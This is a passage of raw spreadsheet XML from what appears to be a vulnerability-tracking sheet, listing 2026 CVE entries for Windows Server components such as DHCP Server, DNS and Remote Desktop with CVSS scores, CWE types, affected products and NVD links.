        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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50" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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51" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K25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253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr">
        <is>
